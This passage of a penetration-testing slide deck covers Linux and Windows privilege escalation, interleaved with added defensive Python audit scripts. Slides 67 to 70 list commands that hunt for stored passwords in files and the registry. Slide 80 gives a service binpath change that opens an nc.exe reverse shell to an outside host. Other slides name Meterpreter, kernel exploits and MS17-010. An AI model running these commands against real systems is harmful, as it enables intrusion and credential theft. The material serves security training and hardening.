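Added example, not from the deck: when reviewing a SUID binary during hardening, a defender checks which of the mitigations on slides 35 and 36 the binary actually carries. The script below reads the ELF program headers the way checksec does: NX from the PT_GNU_STACK flags, PIE from the ELF type (a non-PIE executable is loaded at a fixed address, so ASLR protects its libraries and stack but not the main image, which is why the "static lib" bypass on the slide works), and RELRO. Stack canaries are recorded in the symbol table rather than the program headers and are not checked here. `build_sample_elf` constructs a minimal, code-less ELF image so the script runs offline; `check_file` takes a real path.

```python
import struct
import sys

# Added example (not from the slides): a checksec-style look at ELF program headers.
PT_GNU_STACK = 0x6474E551   # stack permissions requested by the linker
PT_GNU_RELRO = 0x6474E552   # region made read-only after relocation
PF_X = 0x1
ET_EXEC, ET_DYN = 2, 3      # ET_DYN for an executable means PIE


def check_elf_hardening(data):
    """Return {'bits', 'pie', 'nx', 'relro'} for an ELF image given as bytes."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    bits = {1: 32, 2: 64}[data[4]]          # EI_CLASS
    end = {1: "<", 2: ">"}[data[5]]         # EI_DATA: little- or big-endian
    if bits == 64:
        ehdr = struct.unpack_from(end + "16sHHIQQQIHHHHHH", data, 0)
        phdr_fmt, type_idx, flags_idx = end + "IIQQQQQQ", 0, 1
    else:
        ehdr = struct.unpack_from(end + "16sHHIIIIIHHHHHH", data, 0)
        phdr_fmt, type_idx, flags_idx = end + "IIIIIIII", 0, 6
    e_type, e_phoff, e_phentsize, e_phnum = ehdr[1], ehdr[5], ehdr[9], ehdr[10]
    nx = relro = False   # no PT_GNU_STACK header at all means an executable stack
    for i in range(e_phnum):
        ph = struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)
        if ph[type_idx] == PT_GNU_STACK:
            nx = not (ph[flags_idx] & PF_X)
        elif ph[type_idx] == PT_GNU_RELRO:
            relro = True
    return {"bits": bits, "pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def check_file(path):
    with open(path, "rb") as fh:
        return check_elf_hardening(fh.read())


def build_sample_elf(bits=64, pie=False, nx=True, relro=False):
    """Constructed minimal little-endian ELF: header plus program headers, no code."""
    if bits == 64:
        ehdr_fmt, phdr_fmt, ehsize, phentsize, machine = "<16sHHIQQQIHHHHHH", "<IIQQQQQQ", 64, 56, 62
    else:
        ehdr_fmt, phdr_fmt, ehsize, phentsize, machine = "<16sHHIIIIIHHHHHH", "<IIIIIIII", 52, 32, 3
    ident = b"\x7fELF" + bytes([2 if bits == 64 else 1, 1, 1]) + b"\x00" * 9
    phdrs = [(PT_GNU_STACK, 0x6 | (0 if nx else PF_X))]   # PF_R|PF_W, plus PF_X for an executable stack
    if relro:
        phdrs.append((PT_GNU_RELRO, 0x4))
    body = b""
    for p_type, p_flags in phdrs:
        if bits == 64:   # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, memsz, align
            body += struct.pack(phdr_fmt, p_type, p_flags, 0, 0, 0, 0, 0, 0x10)
        else:            # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, align
            body += struct.pack(phdr_fmt, p_type, 0, 0, 0, 0, 0, p_flags, 0x10)
    header = struct.pack(ehdr_fmt, ident, ET_DYN if pie else ET_EXEC, machine, 1,
                         0, ehsize, 0, 0, ehsize, phentsize, len(phdrs), 0, 0, 0)
    return header + body


if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(path, check_file(path))
    if len(sys.argv) == 1:
        print("sample (hardened):", check_elf_hardening(build_sample_elf(pie=True, relro=True)))
        print("sample (legacy):  ", check_elf_hardening(build_sample_elf(bits=32, nx=False)))
```

Run it over the SUID list from slide 24 (`python3 elfcheck.py $(find / -perm -4000 -type f)`, name assumed) to see which root-owned binaries lack NX or PIE; those are the ones to rebuild with `-fstack-protector`, `-z noexecstack` and `-fPIE -pie`, or to drop the SUID bit from.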
  • 37. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users: /etc/cron.d, /etc/crontab, /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly # ls -Ral /etc/cron*
  • 38. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users Reverse shell
  • 39. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  • 41. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
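Added example, not from the deck: the `find / -perm -4000 -o -perm -2000` check from slide 24 and the `ls -Ral /etc/cron*` check from slide 37 combined into one audit a defender can schedule. It lists every setuid/setgid file (anything outside the distribution's expected set deserves a review) and every cron file or directory that a non-root user could modify, which is the condition that lets a low-privilege account alter a job root runs. `build_sample_tree` constructs a throwaway directory imitating /usr/bin and /etc so the script runs offline; pass a real root such as `/` to audit a host.

```python
import os
import stat
import tempfile

# Added example (not from the slides): audit a tree for setuid/setgid binaries and
# for scheduled-job files that non-root users can write.


def find_setuid_setgid(root):
    """Regular files under root with the setuid or setgid bit set, as (relative path, mode)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((os.path.relpath(path, root), oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def find_writable_job_files(root):
    """Entries under <root>/etc/cron* that a non-root user could modify:
    world-writable, or group-writable with a non-root group."""
    etc_dir = os.path.join(root, "etc")
    hits = []
    for entry in sorted(os.listdir(etc_dir)):
        if not entry.startswith("cron"):
            continue
        top = os.path.join(etc_dir, entry)
        paths = [top]
        if os.path.isdir(top):
            for dirpath, dirs, files in os.walk(top):
                paths.extend(os.path.join(dirpath, n) for n in dirs + files)
        for path in paths:
            st = os.lstat(path)
            if st.st_mode & stat.S_IWOTH or (st.st_mode & stat.S_IWGRP and st.st_gid != 0):
                hits.append((os.path.relpath(path, root), oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def audit(root="/"):
    return {"setuid": find_setuid_setgid(root), "writable_jobs": find_writable_job_files(root)}


def build_sample_tree():
    """Constructed sample tree (hypothetical files) with one finding of each kind."""
    root = tempfile.mkdtemp(prefix="privesc_audit_")

    def put(rel, mode):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)

    put("usr/bin/passwd", 0o4755)            # setuid, expected on a real system
    put("usr/bin/vendor_tool", 0o4755)       # setuid third-party binary: review it
    put("usr/bin/ls", 0o755)                 # clean
    put("etc/crontab", 0o644)                # clean
    put("etc/cron.d/backup", 0o666)          # world-writable job file: finding
    put("etc/cron.daily/logrotate", 0o755)   # clean
    for d in ("etc", "etc/cron.d", "etc/cron.daily", "usr", "usr/bin"):
        os.chmod(os.path.join(root, d), 0o755)   # pin directory modes regardless of umask
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for kind, hits in audit(target).items():
        print(kind)
        for rel, mode in hits:
            print(f"  {mode} {rel}")
```

On a real host run it as root so every directory is readable; unreadable directories are skipped silently by `os.walk`. Compare the setuid list against the package manager's record (for example `dpkg -V` or `rpm -Va`) to separate distribution binaries from additions.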
  • 42. # “Privilege Escalation” Ways for Linux • Sudoer (the compromised user may already be in the sudoers list)
  • 43. # “Privilege Escalation” Ways for Linux • System Misconfiguration
  • 44. # “Privilege Escalation” Ways for Linux • Kernel Exploitation Ex: DirtyCOW
  • 45. # “Privilege Escalation” Ways for Linux • Kernel Exploitation (Trick) Ex: Linux version 2.6.9-89.EL • Compile the exploit on the target system, or in a target-like environment • Metasploitable is a good environment for compiling exploits
  • 46. # “Privilege Escalation” Ways for Linux # ps -ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D • Remote Exploitation by local host (127.0.0.1)
  • 47. # “Privilege Escalation” Ways for Linux • [Linux Privilege Escalation Scripts and Commands] Ref: https://netsec.ws/?p=309 ; LinEnum: http://www.rebootuser.com/?p=1758 ; LinuxPrivChecker: http://www.securitysift.com/download/linuxprivchecker.py ; Basic-linux-privilege-escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
  • 48. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  • 49. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  • 50. # “Privilege Escalation” Ways for Linux • Case Study :
  • 51. # “Privilege Escalation” Ways for Linux • Case Study :
  • 52. # “Privilege Escalation” Ways for Linux • Case Study : But no exploit detail in exploit-db !!!
  • 53. # “Privilege Escalation” Ways for Linux • Case Study :
  • 54. # “Privilege Escalation” Ways for Linux • Case Study :
  • 55. # “Privilege Escalation” Ways for Linux • Case Study : (diagram: Low Priv, Bypass Restrict Shell, Dirty Cow, root, Crack root pass, Default password, Other Unix Servers, CMC)
  • 56. # “Privilege Escalation” Ways for Windows • Remote exploit of a vulnerable service running as a high-privilege user • Weak password of high-privilege users • Credentials stored in files and the Registry • Vulnerable applications / programs / services running as high-privilege users • Weak permissions on job/task files run by high-privilege users • System misconfiguration • Kernel exploitation • Pass-the-hash • DLL injection • DLL hijacking • Remote exploitation via localhost • Hot Potato • Many more…
  • 57. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users
  • 58. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users Credit : Worawit Wangwarunyoo (sleepya)
  • 59. • Exploit a misconfigured service running as a high-privilege user # “Privilege Escalation” Ways for Windows
  • 60. • Exploit a misconfigured service running as a high-privilege user # “Privilege Escalation” Ways for Windows
  • 61. # Remote Exploit to escalate privilege • Exploit a misconfigured service running as a high-privilege user WebShell
  • 62. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command
  • 63. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command “It’s not always easy in the real life”
  • 64. • PS Migration # “Privilege Escalation” Ways for Windows
  • 65. • PS Migration # “Privilege Escalation” Ways for Windows
  • 66. • PS Migration # “Privilege Escalation” Ways for Windows
  • 67. # Remote Exploit to escalate privilege • Credential store in files findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini (also search for: Pass, PASS, PWD)
  • 68. # Remote Exploit to escalate privilege • Credential store in files c:\sysprep.inf c:\sysprep\sysprep.xml c:\unattend.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml dir c:\*vnc.ini /s /b dir c:\*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini
  • 69. # Remote Exploit to escalate privilege • Credential store in DC Policy Script files (\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies) https://adsecurity.org/?p=2288
  • 70. # Remote Exploit to escalate privilege • Credential store in registry # VNC reg query "HKCU\Software\ORL\WinVNC3\Password" # Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # SNMP Parameters reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # PuTTY reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
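Added example, not from the deck: the defender's counterpart to the `findstr` and `reg query` searches on slides 67 to 70 (the same patterns cover the Linux configuration, log and history files of slide 20). It scans unattend/sysprep XML, ini-style files and captured `reg query` output for credential material and reports the file, the key name and the line, never the secret itself, so the report can be handed to the owner for rotation and cleanup. The inputs in `SAMPLE_SOURCES` are constructed; `scan_paths` reads real files.

```python
import re

# Added example (not from the slides): locate stored credentials without echoing them.

# key=value style: password=..., pwd: ..., Pass = ...
KV_PATTERN = re.compile(r"(?i)\b(pass(?:word)?|pwd)\b[ \t]*[=:][ \t]*\S+")
# unattend.xml / sysprep style: <Password><Value>...</Value> (base64 when PlainText is false)
XML_PATTERN = re.compile(r"(?is)<(AdministratorPassword|Password)>\s*<Value>\s*[^<]+\s*</Value>")
# one line of `reg query` output: ValueName   REG_SZ   data
REG_PATTERN = re.compile(r"(?im)^[ \t]*(\S*(?:pass|pwd)\S*)[ \t]+(REG_\w+)[ \t]+\S.*$")


def scan_text(source, text):
    """Findings as {source, kind, key, line}; the secret value is deliberately not included."""
    findings = []
    for kind, pattern in (("key=value", KV_PATTERN), ("xml", XML_PATTERN), ("registry", REG_PATTERN)):
        for m in pattern.finditer(text):
            findings.append({
                "source": source,
                "kind": kind,
                "key": m.group(1),
                "line": text.count("\n", 0, m.start()) + 1,
            })
    return findings


def scan_all(sources):
    """sources: {name: text}. Flattened findings across all inputs."""
    out = []
    for name, text in sources.items():
        out.extend(scan_text(name, text))
    return out


def scan_paths(paths):
    """Read files from disk (decode errors ignored, as findstr would) and scan them."""
    sources = {}
    for path in paths:
        try:
            with open(path, "r", errors="ignore") as fh:
                sources[path] = fh.read()
        except OSError:
            continue
    return scan_all(sources)


SAMPLE_SOURCES = {   # constructed inputs, not from any real host
    r"C:\Windows\Panther\Unattend.xml": (
        '<?xml version="1.0"?>\n'
        "<unattend>\n"
        "  <AutoLogon>\n"
        "    <Password><Value>UABhAHMAcwB3AG8AcgBkAA==</Value><PlainText>false</PlainText></Password>\n"
        "    <Username>Administrator</Username>\n"
        "  </AutoLogon>\n"
        "</unattend>\n"
    ),
    r"C:\app\config.ini": "[db]\nuser=appsvc\npassword=Winter2017!\nhost=db01\n",
    "reg query Winlogon": (
        "\n"
        r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" "\n"
        "    AutoAdminLogon    REG_SZ    1\n"
        "    DefaultUserName    REG_SZ    svc_backup\n"
        "    DefaultPassword    REG_SZ    Summ3r!\n"
    ),
}


if __name__ == "__main__":
    import sys
    findings = scan_paths(sys.argv[1:]) if len(sys.argv) > 1 else scan_all(SAMPLE_SOURCES)
    for f in findings:
        print(f"{f['source']}:{f['line']}  {f['kind']}  {f['key']}")
```

Each hit is a cleanup item: delete leftover unattend/sysprep answer files after deployment, move application secrets out of world-readable ini files, and replace registry autologon with a managed account; the value itself should be rotated since anything this script finds, a low-privilege user could have read too.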
  • 71. # Remote Exploit to escalate privilege • Credential store in registry
  • 72. # Remote Exploit to escalate privilege
  • 73. # Remote Exploit to escalate privilege http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html Windows Server 2012
  • 74. # Remote Exploit to escalate privilege
  • 75. # Remote Exploit to escalate privilege • Token Impersonation https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
  • 76. • Insecure Services permission # “Privilege Escalation” Ways for Windows
  • 77. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
  • 78. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  • 79. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows
  • 80. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.110 5555 -e C:\WINDOWS\System32\cmd.exe"
  • 81. • Insecure Services permission by msf # “Privilege Escalation” Ways for Windows
  • 82. # “Privilege Escalation” Ways for Windows
  • 83. # “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
  • 84. # “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths
  • 85. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  • 86. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  • 87. # “Privilege Escalation” Ways for Windows
  • 88. # “Privilege Escalation” Ways for Windows
  • 89. # “Privilege Escalation” Ways for Windows • Unquoted path + MS15-067
  • 90. # “Privilege Escalation” Ways for Windows • Unquoted path + MS15-067
  • 91. # “Privilege Escalation” Ways for Windows GGEZ • Unquoted path + MS15-067
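Added example, not from the deck: the lookup order described on slide 83 for an unquoted service path, written as an audit that flags ambiguous ImagePath values and shows the quoted form that fixes them. The service table here is constructed; on a real host the same name/path pairs come from `wmic service get name,pathname` or `Get-CimInstance Win32_Service`, and only the entries whose earlier candidates sit in a directory writable by standard users are actual findings, which is why paths under %SystemRoot% are skipped by default.

```python
# Added example (not from the slides): detect and fix unquoted service paths.

SYSTEM_PREFIXES = ("c:\\windows\\",)   # not writable by standard users, so lower risk


def service_path_candidates(image_path):
    """Executables Windows would try, in order, for an unquoted path containing spaces.
    An empty list means the path is quoted or has no spaces, so it is unambiguous."""
    p = image_path.strip()
    if not p or p.startswith('"'):
        return []
    exe_end = p.lower().find(".exe")
    exe = p[: exe_end + 4] if exe_end != -1 else p.split(" -")[0]   # drop service arguments
    if " " not in exe:
        return []
    parts = exe.split(" ")
    candidates = []
    for n in range(1, len(parts)):
        prefix = " ".join(parts[:n])
        candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    candidates.append(exe)
    return candidates


def find_unquoted_services(services, skip_system_dirs=True):
    """services: {name: ImagePath}. Returns [(name, candidates)] for risky entries."""
    out = []
    for name, image_path in services.items():
        cands = service_path_candidates(image_path)
        if not cands:
            continue
        if skip_system_dirs and image_path.strip().lower().startswith(SYSTEM_PREFIXES):
            continue
        out.append((name, cands))
    return out


def quoted(image_path):
    """The fix: quote the executable portion and keep the arguments as they were."""
    cands = service_path_candidates(image_path)
    if not cands:
        return image_path
    exe = cands[-1]
    args = image_path.strip()[len(exe):]
    return f'"{exe}"{args}'


SAMPLE_SERVICES = {   # constructed values, not from any real host
    "GoodSvc": r'"C:\Program Files\Good Vendor\good.exe" -k service',
    "VendorUpdater": r'C:\Program Files\Vendor App\updater.exe -service',
    "Spooler": r'C:\Windows\System32\spoolsv.exe',
    "LegacyAgent": r'C:\Windows\Legacy Tools\agent.exe',
}


if __name__ == "__main__":
    for name, cands in find_unquoted_services(SAMPLE_SERVICES):
        print(name)
        for c in cands:
            print("   would try:", c)
        print("   fix:", quoted(SAMPLE_SERVICES[name]))
```

For a flagged service the remediation is to re-register the path with embedded quotes, e.g. `sc config VendorUpdater binPath= "\"C:\Program Files\Vendor App\updater.exe\" -service"`, and to check the ACLs of `C:\` and `C:\Program Files` so that standard users cannot create `Program.exe` there in the first place.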
  • 92. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://msitpros.com/?p=2012 The way that Windows loads DLLs then, is to search the following directories in this order: – The directory from which the application loaded – C:\Windows\System32 – C:\Windows\System – C:\Windows – The current working directory – Directories in the system PATH environment variable – Directories in the user PATH environment variable https://www.gracefulsecurity.com/privesc-dll-hijacking/
  • 93. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://pentestlab.blog/2017/03/27/dll-hijacking/
  • 94. # “Privilege Escalation” Ways for Windows • DLL Hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
  • 97. # “Privilege Escalation” Ways for Windows • Driver Exploitation
  • 98. # “Privilege Escalation” Ways for Windows • Driver Exploitation Example : Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation https://www.exploit-db.com/exploits/42665/
  • 99. • HOT Potato # “Privilege Escalation” Ways for Windows
  • 100. • HOT Potato # “Privilege Escalation” Ways for Windows (screenshots: Manual add user / Use Hot Potato technique)
  • 101. # “Privilege Escalation” Ways for Windows • Pass-the-Hash
  • 102. • Remote Exploit on the localhost # “Privilege Escalation” Ways for Windows
  • 103. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  • 104. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  • 105. • Local Exploit to escalate privilege # “Privilege Escalation” Ways for Windows
  • 106. # “Privilege Escalation” Ways for Windows
  • 107. # “Privilege Escalation” Ways for Windows • Local Exploit to escalate privilege
  • 108. # “Privilege Escalation” Ways for Windows
  • 109. dpkg --add-architecture i386 && apt-get update && apt-get install wine32 pip install pyinstaller # “Privilege Escalation” Ways for Windows
  • 110. # “Privilege Escalation” Ways for Windows DEMO Noobx_shell
  • 111. # “Privilege Escalation” Ways for Windows
  • 112. # “Privilege Escalation” Ways for Windows
  • 113. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 (diagram: DC1, Servers, Client PC, Unpatched)
  • 114. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  • 115. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  • 116. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 (diagram: DC1, Servers, Client PC, Unpatched)
  • 117. # “Privilege Escalation” on other devices • Mobile Phone • Root or Jailbreak • DirtyCow • Network Device • Remote Exploit • EXTRABACON exploit • Backdooring • ROM0 • Password cracking of high-privilege accounts
  • 118. # “Privilege Escalation” on other devices
  • 119. # Prevention • Secure by design • System hardening • Disable unused services • Disable/remove unused programs, users and backup files • Install endpoint security • Strong access control and authentication • Least privilege • Patch management • Security assessment • Vulnerability assessment • Penetration testing
  • 120. Q & A
  • 122. Thank You Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  • 123. # References • http://www.fuzzysecurity.com/tutorials/16.html • https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html • https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md • http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/ • https://pentestlab.blog/2017/04/04/dll-injection